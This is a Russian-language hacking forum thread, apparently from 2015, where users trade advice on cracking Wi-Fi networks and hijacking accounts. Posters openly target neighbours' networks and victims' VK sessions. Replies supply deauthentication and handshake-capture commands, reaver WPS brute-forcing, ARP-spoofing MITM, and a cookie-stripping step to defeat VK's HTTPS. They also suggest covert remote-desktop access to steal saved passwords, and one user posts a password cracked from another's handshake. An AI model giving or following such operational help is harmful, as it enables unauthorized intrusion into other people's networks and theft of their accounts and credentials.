Просмотр полной версии : [Wi-Fi, BT] Задай вопрос - получи ответ!
[Wi-Fi, BT] Задай вопрос - получи ответ!
Тема для мелких/простых вопросов по беспроводным сетям, дабы не создавать для каждого отдельный топик, задаем вопросы касающиеся WI-Fi и BT в этой теме.
Просьба не спрашивать в этой теме о проблемах работы Linux систем, для этого существует отдельный раздел. Тут задаем вопросы непосредственно связанные с Wi-Fi и BT!
Прошу не отвечать на вопросы тролингом или набивкой постов , а что самое главное
вы понятия не имеете о чем речь идет и даете ответы людям которые не знают (что им конкретно надо)
и заводите их в заблуждение , и прошу если уже есть один актуальный ответ - не постить свои ответы ! зачем - если вопрос решен !!!!
Предыдущая тема тут: https://forum.antichat.ru/threads/48818/
Походу здесь есть решение с интерфейсом wlan0mon в новом Aircrack
https://forum.aircrack-ng.org/index.php/topic,968.msg2873.html#msg2873
не понимаю только, где какой файл в исходниках нужно править?
Здравствуйте.
Подскажите, при взломе ривером через перебор пинов при остановке взлома сессия сохраняется и при возобновлении продолжается с того же места. Ломаю с помощью загрузочного диска Бэк Трэк. Можно ли как нибудь сохранить эту сессию на комп или флешку, чтобы после перезагрузки компа продолжить оттуда же. Ломается сеть очень долго, 10% только за ночь.
Можно не отвечать, уже нашёл
Привет.
Знаю, тема на форуме избитая, но так как просто "разбегаются глаза" и не имею достаточного опыта, все таки спрошу:
Посоветуйте, пожалуйста наиболее подходящий для вардрайва (чувствительный чип, отличный при работе в режиме мониторинга, мощный сигнал для mdk3-атаки), на ваш взгляд, WiFi роутер для перепрошивки его под WIFI Pineapple Mark V, а также наиболее подходящую для этих целей антену (как я понял, желательно панельную - так как это промежуточное звено между всенаправлеными антенами и антенами направленого типа yagi).
Свой выбор я пока что остановил на:
1) Роутере Alfa Network AP-121U (так как его часто советуют в туториалах на ютубе =))) ).
2) И на антене http://www.ebay.com/itm/14dB-2-4GMH...ectional_Network_Antennas&hash=item2c661b57d6
Хотя встречал положительные отзывы о Tp-link'ах. Сейчас у меня: tp-link 722N. И может быть мне роутер докупать не стоит (хотя уверен вы можете предложить что-то почуствительнее), так как встретил пост следующего содержания:
Собираем сами: raspberry pi b + tp-link 722N (хотя в соседнем топике меня ругали за этот модем, все же я неприклонен - купить его 5 минут, а не ждать N дней из китая N900, хотя если хотите ждать - лучше N900 взять. Зачем? Марк уже устарел технически начинкою, так и прошивкою. На малину же ставим kali linux и не знаем проблем.
По поводу автономного питания: любой водо-пыле защищенный бокс + любой павер банк, желательно xiaomi или lenovo)
Что не понятно если - пишите, разложу все по полочкам)
В бюджете имею 30$ на роутер и еще 25$ на антену. Все это хочу покупать на ebay.
Да и в общем интересно послушать мнение экспертов по данному вопросу =). По ходу написания вопроса возникло еще несколько:
1) Киньте пожалуйста ссылочку на тему: "Собираем сами: raspberry pi b + tp-link 722N"
2) По ходу пересмотрев несколько тем по антенам на форуме встретил мнение: что возможно лучше собрать самому антену по типу такой: http://www.lan23.ru/wifi/fa20.html. Поделитесь ссылочкой на наиболее простую и наиболее эффективную антену для вардрайва, по вашему мнению.
3) Вечно мучал вопрос откуда вам известно на каком чипе работает адаптер ( гугл в помощь или есть конкретные ресурсы)? =)
И да, извините за отсутствие краткости и лаконичности в посте. =) Увы это не мой "конек".
Решение на малине, очевидно, более гибкое, т.к. это kali. Возможно, в pinapple есть что-то, чего нет будет в kali, но я сильно сомневаюсь.
Собираем сами: raspberry pi b + tp-link 722N"
Эта карта в линукс работает из коробки.
что возможно лучше собрать самому антену
Правильно собранная антенна (размеры, кабель итд) будет наверняка лучше и дешевле заводской такой же схемы. Но нужны прямые руки и вдохновение
Вечно мучал вопрос откуда вам известно на каком чипе работает адаптер
wikidevi.com
Модель вбивать точно, со всеми буковками.
Спасибо. А не подскажете что нибуть по личному опыту из более мощных адаптеров, ну и антену какую лучше выбрать? Посмотрел по ценам на ebay, то получаеться дешевле купить две антены - направленую yagi и всенаправленую, чем одну панельную. Но, остаються сомнения насчет: будет ли направленая yagi собирать хандшейки так же хорошо, как и панельная. То есть, как у нее с перехватом?
Всенаправленая: http://www.ebay.com/itm/2-4-GHz-17d...059?pt=LH_DefaultDomain_2&hash=item4d2d511bdb
Направленая yagi: http://www.ebay.com/itm/2-4GHz-20db...030?pt=LH_DefaultDomain_2&hash=item2c662d8056
Панельная: http://www.ebay.com/itm/14dB-2-4GMH...ectional_Network_Antennas&hash=item2c661b57d6
С хорошей антенной мощность в адаптере в принципе не нужна. Только загадишь эфир. Могу только сказать, что alfa036H тебе не подойдет, т.к. она не поддерживает master mode - режим точки доступа.
Atheros нормальный чипсет, поэтому попробуй сначала свою карту. Я правда, помню, что у меня были с такой как у тебя картой какие-то глюки, но это было давно, и я уже не помню, что именно было не так. Возможно, конкретный экземпляр был плох.
Всенаправленая
По ссылке явная лажа с указанным усилением. При такой длине там будет, ну, децибела 3-4. На 17 она должна быть пару метров в длину Когда-то я находил и постил тут расчет длины от усиления.
По яге тоже лажа, 20 не может там быть. 15-16...
Ты должен понимать, что разный тип антенны = разный вариант использования. То, что не словит яга, словит панелька и наоборот. У каждой антенны своя диаграмма направленности. Яга - луч, панелька - сектор, всенаправленная - круг. Но, например, по горизонтали у всенаправленной угол небольшой, т.е. получается в итоге не шар, а "бублик". Ну, не совсем бублик, но мысль ты, думаю, понял.
Здравствуйте!
Как зайти в роуте по внешнему IP
109.163.245.233 ?
binarymaster
01.05.2015, 15:36
Здравствуйте!
Как зайти в роуте по внешнему IP
109.163.245.233 ?
Host is up.
All 1000 scanned ports on 109.163.245.233 are filtered
Никак.
Какой прогой порты сканить?
Какой прогой порты сканить?
Например angry ip scanner. Порты интересующие нас на роутерах это ssh (22) , telnet (21), http (80,8080)
Народ, я вот не пойму, почему до сих пор никто не упоминал про новую уязвимость: https://www.linux.org.ru/news/security/11544752 ? Или может быть я просто не заметил.
Опубликованы сведения о критической уязвимости CVE-2015-1863 в wpa_supplicant, которая может позволить выполнить код при обработке SSID беспроводной сети злоумышленника.
Уязвимость заключается в отсутствии корректной проверки длины поля SSID, благодаря чему злоумышленник может осуществить переполнение и перезаписать указатель структуры p2p_device, по которому в дальнейшем передаётся управление.
Уязвимы версии wpa_supplicant с 1.0 по 2.4. Необходимым условием является включение на стороне жертвы опции CONFIG_P2P, которая, обычно, включена по умолчанию. До исправления проблемы рекомендуется отключить режим P2P в файле конфигурации.
Есть ли движение в сторону этой уязвимости? Т.е. актуальна ли она при взломе wifi на android и есть ли написаные скрипты и проги которые используют эту уязвимость?
Stalker5
01.05.2015, 23:39
Как исправить ошибку Failed to associate with в Reaver ? И как изменить MAC-адрес в Backtrack?
как изменить MAC-адрес в Backtrack?
################################################## #####################
sudo -i
/etc/init.d/networking stop
ifconfig wlan0 down
ifconfig wlan0 hw ether 6C:719:99:2A:7B
/etc/init.d/networking start
ifconfig wlan0 up
################################################## #####################
http://en.wikibooks.org/wiki/Changing_Your_MAC_Address/Linux
Должно изменить.
Как исправить ошибку Failed to associate with в Reaver ?
Это смотря после чего он это пишет. Советуют добавить параметр -T 0.5, ну или ближе к точке доступа подойти. Хотя чесно говоря, мне это никогда не помогало. Как я понял проблема в самом адаптере или точке доступа.
Stalker5
02.05.2015, 00:03
С адресом разобрался, а к точке я и так близко - сигнал -60 db . Судя по всему меня на точке забанило.
Т.е. актуальна ли она при взломе wifi на android
Из данного скудного описания совершенно непонятно, как это вообще эксплуатировать. Возможно, конечно, что я не так что-то понял описании, но wpa_supplicant предполагает наличие шифрования на точке. А кто будет пытаться подключаться к точке с неизвестным шифрованием?..
Из данного скудного описания совершенно непонятно, как это вообще эксплуатировать. Возможно, конечно, что я не так что-то понял описании, но wpa_supplicant предполагает наличие шифрования на точке. А кто будет пытаться подключаться к точке с неизвестным шифрованием?..
Ну да, скудное так как не мое. Просто меня удивило, что на античате эта уязвимость еще не обсуждалась и даже в новостях не проскакивала.
Например angry ip scanner. Порты интересующие нас на роутерах это ssh (22) , telnet (21), http (80,8080)
открыт порт 80, не подходит логин и пасс , обойти можно?
binarymaster
02.05.2015, 12:56
открыт порт 80, не подходит логин и пасс , обойти можно?
Модель роутера известна?
binarymaster
02.05.2015, 13:08
TP Link TL-WR841N
Вряд ли получится, на TP-Link нет известных уязвимостей обхода авторизации.
Господа, имею следующий вопрос (разумеется, теоретический ).
Есть Wi-Fi сетка (моя), экспериментирую в ней же. Цель: получить сессию vk.com . Творится какая-то е";%ая магия, происходящее я понять решительно не могу:
Запускаю Intercepter-NG, делаю отправление ARP-кэша на клиенте (ARP запись на клиенте меняется, я посмотрел). И дальше начинается самое интересное - от любого другого сайта сессия перехватывается на раз, однако сессия для vk.com появляется на вкладке "Password mode" совершенно спонтанно (запись может появится, может долгое время не появлятся, хотя я щелкаю по ссылкам на клиенте). Разумеется, я не использую httpS, все идет по HTTP.
Думал, что глючит Intercepter-NG, запустил CookieMonster из WifiSlax, результаты те же.
Анализировал wireshark'ом на клиенте, запросы уходят в HTTP (cookies присутствуют) на атакующий компьютер.
Очень хочется понять в чем дело, буду благодарен, если кто подскажет.
Stalker5
03.05.2015, 13:11
Как правильно направлять антенну? У меня Alfa APA-L2419M , вообщем точки ловит, но не так, как хотелось бы, крутить начинаю - тут же всё меняется ли вообще пропадает. Может там какие-то тонкости есть?
validk2009
03.05.2015, 20:37
Извиняюсь, пробую первый раз, правильно ли захвачен handshake?
http://rghost.ru/7qZv4SVzC
aircrack-ng показывает что есть handshake
юзал wifislax-4-10-1-Ru, а там GOYscript wpa
miniddwep-gtk-40420 при загрузке недавно такую надпись стала мне выдавать:
This software is a tool to audit security of home wireless router
it is illegal to crack others wireless router password
Abandob WEP,Love WPA2
Disable WPS
reaver установлен из стабильного репозитория Debian Jessie. На Wheezy такая же ерунда творится Во время сканирования почему-то не все роутеры программа видит, может правда тут дело в aircrack-ng которую я ставил из репозитория Дебиана.
Извиняюсь, пробую первый раз, правильно ли захвачен handshake?
http://rghost.ru/7qZv4SVzC
aircrack-ng показывает что есть handshake
юзал wifislax-4-10-1-Ru, а там GOYscript wpa
Хендшнйк годный
Пароль:77733440
miniddwep-gtk-40420 при загрузке недавно такую надпись стала мне выдавать:
This software is a tool to audit security of home wireless router
it is illegal to crack others wireless router password
Abandob WEP,Love WPA2
Disable WPS
reaver установлен из стабильного репозитория Debian Jessie. На Wheezy такая же ерунда творится Во время сканирования почему-то не все роутеры программа видит, может правда тут дело в aircrack-ng которую я ставил из репозитория Дебиана.
Такая надписть в minidwep-gtk была всегда:
http://s020.radikal.ru/i701/1505/b2/834ce6587191t.jpg
Такая надписть в minidwep-gtk была всегда:
http://s020.radikal.ru/i701/1505/b2/834ce6587191t.jpg
Понял. В Wifislax лежит некая патченная версия, которая показывает wps и делает перебор ривером. Где бы deb-пакет раздобыть?
Andrey9999
04.05.2015, 01:45
Понял. В Wifislax лежит некая патченная версия, которая показывает wps и делает перебор ривером. Где бы deb-пакет раздобыть?
отсель попробуй
отсель попробуй
Отсюда вообще-то и ставил. В этих версиях не работает wps.
Andrey9999
04.05.2015, 02:32
По идее, если ривер установлен - должно работать...
Stalker5
04.05.2015, 14:47
http://rghost.ru/private/6JCM5nrbt/f77e88391cd499b0cc703fe55012fcd5 - Поймал хендшейк, но почему-то он не перебирается. До этого ловил хендшейк, такая же фигня. Kali Linux пишет "WPA Handshake ......" , вообщем что я делаю неправильно? Может быть дело в Kali Linux, и мне надо использовать только BackTrack? Два хендшейка уже поймал просто в Kali Linux, и они чем-то не устраивают hashcat'у
http://rghost.ru/private/6JCM5nrbt/f77e88391cd499b0cc703fe55012fcd5 - Поймал хендшейк, но почему-то он не перебирается. До этого ловил хендшейк, такая же фигня. Kali Linux пишет "WPA Handshake ......" , вообщем что я делаю неправильно? Может быть дело в Kali Linux, и мне надо использовать только BackTrack? Два хендшейка уже поймал просто в Kali Linux, и они чем-то не устраивают hashcat'у
BackTrack это и есть Kali Linux.
Вы просто не сконвертировали .cap файл в .hccap который "кушает" oclHashcat.
Как это сделать - подробнее здесь.
Stalker5
04.05.2015, 15:31
BackTrack это и есть Kali Linux.
Вы просто не сконвертировали .cap файл в .hccap который "кушает" oclHashcat.
Как это сделать - подробнее здесь.
Я уже пробовал заливать на этот сервис хендшейк, он мне пишет:
[error ] unable to find valid handshakes.
Когда я в BackTrack'е ловил хендшейки, он мне без базара их конвертировал, но когда я стал ловить их в Kali Linux - он у меня перестал их принимать. Возможно, проблема ещё в самой точке, так как я 2 хендшейка пробовал от одной и той же точки, сейчас антенну короче на крышу попробую поставить , и попробую другие точки повзламывать.
Всё, разобрался. Там точка плохая.
validk2009
04.05.2015, 18:16
Хендшнйк годный
Пароль:77733440
да всё верно,cпасибо)
Konst_r77
05.05.2015, 00:17
Всем доброго времени суток.
Коллеги, такой вопрос - интересует перехват трафика wi fi сети, атакующий находится внутри этой сети. Поиск советует способы базирующиеся на arp спуфинге. Но тут есть проблема 1. то ли роутер с защитой, то ли еще что не таблицу я отравить не могу 2. предполагаю проблему появления больших задержек в сети. Поэтому возник вопрос почему не сменить базу, и исключить арп спуфинг.
Если перевести адаптер в неразборчивый режим и отфильтровать нужный трафик по маку \ ипу, остаются его скормить какому-то анализатору что бы вытащил пароли. Можно ли так извлечь https пароли, или там необходима живая сессия?
Суть вопроса - альтернативные способы поймать пароли в вай фай сети.
PS
да всё верно,cпасибо)
Что тут теперь можно выложить хендшейк а тебе его расшифруют? Мне не то что лень, но вычислительные мощности они не у всех....)
binarymaster
05.05.2015, 00:24
Если перевести адаптер в неразборчивый режим и отфильтровать нужный трафик по маку \ ипу, остаются его скормить какому-то анализатору что бы вытащил пароли. Можно ли так извлечь https пароли, или там необходима живая сессия?
Суть вопроса - альтернативные способы поймать пароли в вай фай сети.
HTTPS в любом случае отснифать в пассивном режиме не получится. В активном придётся подменить сертификат, но это естественно будет заметно.
Что тут теперь можно выложить хендшейк а тебе его расшифруют? Мне не то что лень, но вычислительные мощности они не у всех....)
Вообще-то есть отдельная тема для этого, сообщение выше просто небольшое исключение.
Konst_r77
05.05.2015, 00:48
HTTPS в любом случае отснифать в пассивном режиме не получится. В активном придётся подменить сертификат, но это естественно будет заметно.
Жаль что авторы статей об этом не упоминают. Я так понимаю жертва увидит в браузере аларм о не доверенном сертификате?
Остается вопрос как анализировать трафик пассивно?
Вообще-то есть отдельная тема для этого, сообщение выше просто небольшое исключение.
Класс, теперь я не завишу от WPS)!
binarymaster
05.05.2015, 05:59
и
Жаль что авторы статей об этом не упоминают. Я так понимаю жертва увидит в браузере аларм о не доверенном сертификате?
Именно. В случае использования сайтом HSTS браузер может вообще не позволить открыть сайт.
Остается вопрос как анализировать трафик пассивно?
1. Если точка доступа без шифрования, то предельно просто - используя airodump-ng с фильтрацией по MAC-адресам точки и клиента. После как данные перехвачены, достаточно удалить заголовки 802.11 из пакетов, чтобы получить привычный cap-файл.
2. Если шифрование WEP - предварительно дешифровать, используя известный ключ.
3. Если WPA/WPA2 - для дешифровки потока данных необходимо перехватить 4-х сторонний хендшейк полностью. Дешифровать получится только в пределах сессии от хендшейка к хендшейку.
Во всех трёх случаях нужно находиться физически близко к клиенту.
Дешифровка и обрезание заголовков делается через Wireshark, также можно использовать Cain & Abel.
Konst_r77
05.05.2015, 16:14
и
Именно. В случае использования сайтом HSTS браузер может вообще не позволить открыть сайт.
1. Если точка доступа без шифрования, то предельно просто - используя airodump-ng с фильтрацией по MAC-адресам точки и клиента. После как данные перехвачены, достаточно удалить заголовки 802.11 из пакетов, чтобы получить привычный cap-файл.
2. Если шифрование WEP - предварительно дешифровать, используя известный ключ.
3. Если WPA/WPA2 - для дешифровки потока данных необходимо перехватить 4-х сторонний хендшейк полностью. Дешифровать получится только в пределах сессии от хендшейка к хендшейку.
Во всех трёх случаях нужно находиться физически близко к клиенту.
Дешифровка и обрезание заголовков делается через Wireshark, также можно использовать Cain & Abel.
Эти вещи мне понятны, я изначально указывал что нахожусь в интересующей сети. используется wpa\wpa2. Пароль у меня есть. Хотя трафик ловить я буду все равно в режиме захвата, получается в этот самый момент мне не обязательно быть авторизованным в сети. Встает вопрос как мне пароль использовать потом при расшифровке\анализе трафика?
Еще с анализаторами вопрос хотелось бы прояснить. wire shark - понятно, cain & abel посмотрю. Мб есть еще что то?
Добрый день комрады! Вот тут посетила меня светлая мысль, А что если для брута хешей использовать игровую приставку? Как я понимаю графический процессор в той же PS4 - огонь... Погуглил, но что то ничего не нашел... Кто что может сказать об этом?
Добрый день комрады! Вот тут посетила меня светлая мысль, А что если для брута хешей использовать игровую приставку? Как я понимаю графический процессор в той же PS4 - огонь... Погуглил, но что то ничего не нашел... Кто что может сказать об этом?
Если в кратце - процесспроцессор там не огонь и для брута медленный. Тут уже была тема про брут приставкой:
https://forum.antichat.ru/threads/335107/#post-3158560
Если в кратце - процесспроцессор там не огонь и для брута медленный. Тут уже была тема про брут приставкой:
https://forum.antichat.ru/threads/335107/#post-3158560
Я писал про PS4, там новый графический процессор от ATI/AMD и производительность его на высоте. Другое дело что как я понял необходимого софта нет....
Я писал про PS4, там новый графический процессор от ATI/AMD и производительность его на высоте. Другое дело что как я понял необходимого софта нет....
Там не такой и новый графический процессор 2012 года —он приблизительный аналог Radeon HD7850/7870 ( не самые быстрые видяхи). Его не поддерживает OpenCL и брутить что либо с его помощью не имеет смысла.
Интересуют куки жертвы от ВК через его сеть ВФ. Как это сделать? Есть ли возможность потом использовать их вне сети жертвы?
Для своего времяпровождения в сети человек исп. ПК по каб и телефон через ВФ.
Пытался по методу, что описан здесь сделать: http://forum.antichat.ru/threads/345266/
сессии не ловятся. не знаю в чем дело...
Интересуют куки жертвы от ВК через его сеть ВФ. Как это сделать? Есть ли возможность потом использовать их вне сети жертвы?
Для своего времяпровождения в сети человек исп. ПК по каб и телефон через ВФ.
Пытался по методу, что описан здесь сделать: http://forum.antichat.ru/threads/345266/
сессии не ловятся. не знаю в чем дело...
Если жертва сидит вКонтактике через приложение - cookies не перехватываються (т.к. авторизация идет через API).
Если жертва сидит вКонтактике через https - cookies без ssl MITM не перехватите.
Всем доброго времени суток!
Пока только начинаю вникать в это дело, поэтому прошу сильно не пинать за дилетантство..
С недавнего времени появился интерес получениям паролей к wifi сетям.
На соседях тренируюсь, одну легкую получилось сбрутить.
Есть одна сеть с очень хорошим сигналом (Metro-144), которую очень хотелось-бы получить, но никак не могу поймать хендшейк( направьте меня, может не так делаю что.
для сбора запускаю как обычно команду
sudo airodump-ng mon0 -c 6 --bssid 10:FE:ED:ED:AD:22 -w wpa2
http://s020.radikal.ru/i702/1505/d0/291829473817.jpg
Насторожило, что нет клиента часто (видно по фото), очень редко появляется. Хотя через общий мониторинг его видно.
Я в этот момент командой его деавторизую.
sudo aireplay-ng mon0 -0 100 -a 10:FE:ED:ED:AD:22 -c 00:73:E0:0F:81C
Обычно все получается. Но в итоге даже не 0 хендшейков, а нет впа данных
http://s47.radikal.ru/i115/1505/15/243bed661d92.jpg
что не так?
Как получить пакеты данных именно от этой сети?
Если жертва сидит вКонтактике через приложение - cookies не перехватываються (т.к. авторизация идет через API).
Если жертва сидит вКонтактике через https - cookies без ssl MITM не перехватите.
Какие у меня есть варианты и как мне их осуществить? помогите пожалуйста. Мне лишь через DroidShip (прога для андройда) удалось поймать сессию и то по http.
Но как мне использовать сохраненные куки из приложения в другой сети?
Andrey9999
10.05.2015, 04:47
kentuha, проще minidwep'ом пользоваться - он сам все сделает, если будет возможность
binarymaster
10.05.2015, 05:10
что не так?
Как получить пакеты данных именно от этой сети?
Смущает, что airodump-ng показывает fixed channel -1. Думаю, дело в этом.
kentuha, проще minidwep'ом пользоваться - он сам все сделает, если будет возможность
Спасибо парни попробую покурю еще эту тему.
Андрей подскажи репозиторий откуда взять можно этот minidwep?
Какие у меня есть варианты и как мне их осуществить? помогите пожалуйста. Мне лишь через DroidShip (прога для андройда) удалось поймать сессию и то по http.
Но как мне использовать сохраненные куки из приложения в другой сети?
Вариант с intercepter-ng и ssl MitM. Cookies от vk.com в другой сети никак не использовать, в них идет привязка к ip сети.
Вариант с intercepter-ng и ssl MitM. Cookies от vk.com в другой сети никак не использовать, в них идет привязка к ip сети.
У меня не особо получилось разобраться с intercepter-ng...
А подмену ip не сделать?
Можно ли вытащить куки прямо с компа? Скажем через телнет?
Еще такой вопрос: что я могу сделать посредством телнет? (есть возможность открыть порт на маршр.)
Чтож, делюсь результатами:
Использовал intercepter-ng на андройде - перехватываю сессию и пароли, но только при авторизации через http...
https не видит даже при включенном sslstrip.
Есть ли у кого мысли по этому поводу? как обойти эту проблему?
Спасибо парни попробую покурю еще эту тему.
Андрей подскажи репозиторий откуда взять можно этот minidwep?
в убунтовком он должен быть, попробуй :
sudo apt-get install minidwep-gtk
Кто-нибудь знает, как заставить жертву зайти через простое соединение?
binarymaster
10.05.2015, 16:43
Кто-нибудь знает, как заставить жертву зайти через простое соединение?
ВК при использовании https не отправляет remixsid в небезопасном запросе, а также он хранит специальный флаг для перенаправления на https в случае открытия http ссылки. Есть один вариант, но он потребует Linux и гибкой настройки iptables (и не только) при ARP-спуфинге:
1. Резать соединения на 443/tcp порт
2. В запросах к ВК удалять кукис remixsslsid=1;
Также есть смысл просто стереть эту печеньку у клиента, добавив заголовок к ответу от сервера:
Set-Cookie: remixsslsid=deleted; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
3. При использовании этой техники есть вероятность, что клиенту придётся перелогиниться, но я не проверял
ВК при использовании https не отправляет remixsid в небезопасном запросе, а также он хранит специальный флаг для перенаправления на https в случае открытия http ссылки. Есть один вариант, но он потребует Linux и гибкой настройки iptables (и не только) при ARP-спуфинге:
1. Резать соединения на 443/tcp порт
2. В запросах к ВК удалять кукис remixsslsid=1;
Также есть смысл просто стереть эту печеньку у клиента, добавив заголовок к ответу от сервера:
Set-Cookie: remixsslsid=deleted; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
3. При использовании этой техники есть вероятность, что клиенту придётся перелогиниться, но я не проверял
Сразу видно знающего человека!!
Можешь подробнее расписать? я должен это попробовать)
Или может есть еще способ через телнет? или уд. рабочий стол?
binarymaster
11.05.2015, 02:26
Можешь подробнее расписать? я должен это попробовать)
На память не воспроизведу, но каждую описанную задачу можно погуглить немного.
Или может есть еще способ через телнет? или уд. рабочий стол?
Через телнет уже не вариант, муторно. Через удалённый рабочий стол - можно утянуть пароли, используя софт для восстановления забытых паролей. Если есть полный доступ к жертве, то последний вариант самый удобный. Для одновременной работы с пользователем без его "выкидывания" можно воспользоваться RDP Wrapper'ом.
На память не воспроизведу, но каждую описанную задачу можно погуглить немного.
Через телнет уже не вариант, муторно. Через удалённый рабочий стол - можно утянуть пароли, используя софт для восстановления забытых паролей. Если есть полный доступ к жертве, то последний вариант самый удобный. Для одновременной работы с пользователем без его "выкидывания" можно воспользоваться RDP Wrapper'ом.
А что за софт для восстановления паролей? Пароль то при этом не поменяется?
Можешь подробней? А то я профан, не могу найти ничего..(
Пытался подключиться удаленно к своему 2ому компу в сетке...не даёт! В чем дело? Ввожу имя компьютера, но выдает ошибку(
Уже который день страдаю на хендшейками. Самая лакомая сетка и никак не хочет поддаваться.
Роутер настроен провайдером, у нас есть такие "Метросеть", роутер обозван Metro-144, канал не стандартный стоит: 6ch.
Так вот вопрос, может ли провайдер настроить так, чтобы не видны были подключенные к роутеру устройства?
Уже второй день скан стоит на хендшейки, сначала вручную, теперь пробую minidwep, все бесполезно, как будто не одного устройства так и не подключено.
Тут либо люди напрямую подключают комп к роутеру, либо что-то хитро настроено...
upd:
дождался я устройства, minidwep пытается снять хендейшк, но пока безрезультатно.
Есть идеи ребят?
http://s006.radikal.ru/i215/1505/4d/a9c30ce3424d.jpg
Василий-Шишкин
12.05.2015, 14:14
Добрый день.
В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30.
Прочитал статью по ссылке (тоже на этом форуме), и много других.
Что я делал:
- подключил WiFi адаптер Alfa AWUS036H.
- переключил в режим мониторинга:
root@kali-Linux:~# airodump-ng mon0
CH 3 ][ Elapsed: 4 s ][ 2015-05-11 19:29
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BC:F6:85:BF:C0:E6 -59 2 0 0 4 54e WPA CCMP PSK Kira-
10:BF:48:E6:55:18 -70 4 0 0 6 54e WPA2 CCMP PSK Roofl
B0:B2:DC:DC:C5:59 -63 3 0 0 8 54e WPA2 CCMP PSK Archi
D4:21:22:53:CE:65 -76 6 0 0 8 54e WPA2 CCMP PSK MGTS_
B0:B2:DC:DC:C5:58 -67 11 0 0 8 54e WPA2 CCMP PSK Archi
60:A4:4C:DE:45:48 -74 2 0 0 4 54e WPA2 CCMP PSK ASUS
C0:C1:C0:48:76:8F -74 2 0 0 2 54e. WPA2 CCMP PSK Alati
60:A4:4C:A2:B7:F8 -65 2 0 0 13 54e WPA2 CCMP PSK TAGNA
00:14:D1:A5:4A:95 -67 2 0 0 11 54e. WPA2 CCMP PSK SPIDE
D8:50:E6:D7:39:60 -67 12 3 0 6 54e WPA2 CCMP PSK Anako
00:22:15:71:2A:E5 -59 20 3 0 6 54 WPA TKIP PSK WL520
00:1C:F0:3B:C3:05 -66 18 4 1 6 54 . WPA TKIP PSK dlink
C4:6E:1F:D5:AE:8A -71 2 0 0 6 54e. WPA2 CCMP PSK TP-LI
90:E6:BA:F1:6C:30 -57 3 2 0 6 54 WPA2 CCMP PSK proje
00:25:9C:F7:36:85 -53 21 0 0 9 54e. WPA2 CCMP PSK Port
D4:21:22:99:45:61 -75 3 0 0 1 54e WPA2 CCMP PSK MGTS_
00:17:9A:84:FD:45 -71 3 0 0 3 54 . WPA2 CCMP PSK 2b4A9
C2:9F:DB:F7:43:B4 -69 0 3 0 1 -1 OPN
Lua: Error during loading:
[string "/usr/share/wireshark/init.lua"]:46: dofile has been disabled due to running Wireshark as superuser. See http://wiki.wireshark.org/CaptureSetup/CapturePrivileges for help in running Wireshark as an unprivileged user.
[/QUOTE]
Но всеже окрывает, и там ни чего нет, иногда есть но ни каких хендшейков, лишь информация о роутре и тому подобное.
через aircrack-ng, но все равно ни чего не вышло:
[CODE]
root@kali-Linux:~# aircrack-ng /wep.cap
Opening /wep.cap
read(file header) failed: Success
Read 0 packets.
No networks found, exiting.
Quitting aircrack-ng...
- снова перешел к airodump-ng, попробовал:
root@kali-Linux:~# airodump-ng --bssid CC:5D:4E:DA:11:C8 -c1 -w hachthis mon0
CH 1 ][ Elapsed: 59 mins ][ 2015-05-11 20:02 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
CC:5D:4E:DA:11:C8 -60 0 5500 417 0 1 54e WPA2 CCMP PSK Sashko
BSSID STATION PWR Rate Lost Frames Probe
в этоже время пробовал откдючвть клиентов:
root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 mon0
21:08:34 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
21:08:34 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 -e Sashko mon0
21:08:41 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
21:08:41 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
- снова ни чего не вышло, только других способов больше не знаю.
В чем ошибка ума не приложу, весь русские и английские форумы и статьи прочитал и облазил, полностю в ТУПИКЕ.
Заранее благодарен.[/QUOTE][/QUOTE]
Но всеже окрывает, и там ни чего нет, иногда есть но ни каких хендшейков, лишь информация о роутре и тому подобное.
Opening /wep.cap
read(file header) failed: Success
Read 0 packets.
No networks found, exiting.
- а что ты там хотел увидеть? у тебя и нет точек с WEP шифрованием.
- для перехвата в besside-ng точек с WPA надо хелп читать внимательно:
To get WPA handshake from a specific target (channel and BSSID):
# besside-ng -W -c 6 -b 00:00:11:22:33:44 mon0
Василий-Шишкин
12.05.2015, 14:47
- а что ты там хотел увидеть? у тебя и нет точек с WEP шифрованием.
- для перехвата в besside-ng точек с WPA надо хелп читать внимательно:
To get WPA handshake from a specific target (channel and BSSID):
# besside-ng -W -c 6 -b 00:00:11:22:33:44 mon0
WEP - точки обязательно нужны? Автор же писал что это большая редкость, как я их найду тогда?
Василий-Шишкин
12.05.2015, 14:52
Слишком громко сказал, не найду. Шел около BMW центра:
CH 2 ][ Elapsed: 1 min ][ 2015-05-12 13:44
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:B3:6E:F6:22:9E -1 3 0 0 6 11 OPN HP3420
60:A4:4C:F0:1B:18 -58 71 36 0 6 54e. WPA2 CCMP PSK WEYLAND
-----> 1C:BD:B9:3E:1D:24 -58 132 116 0 1 54 . WEP WEP BMTWlan_1
10:FE:ED:36:F3:3E -66 93 0 0 6 54e. WPA2 CCMP PSK Belka
-----> 00:1F:1F:C5:F5:58 -68 121 0 0 11 54e WEP WEP Digitus304
00:22:55:57:51:00 -65 85 114 0 7 54e. OPN bmstu_staff
BC:F6:85:44:9B:CE -65 135 0 0 5 54e WPA CCMP PSK homeAL
EC:43:F6:08:E0:7C -64 89 7 0 4 54e WPA2 CCMP PSK sen_shamon
C0:4A:00:DF:4A:E6 -66 103 0 0 9 54e. WPA2 CCMP PSK s13195
B8:A3:86:14:13:F0 -66 126 0 0 2 54e WPA CCMP PSK instation
10:FE:ED:80:95:10 -66 9 0 0 8 54e. WPA2 CCMP PSK TP-LINK
1C:7E:E5:91:DB:4C -66 16 5 0 6 54e WPA CCMP PSK DIR-620
10:7B:EF:56:2B:BC -68 106 2 0 3 54e WEP WEP vpn9001
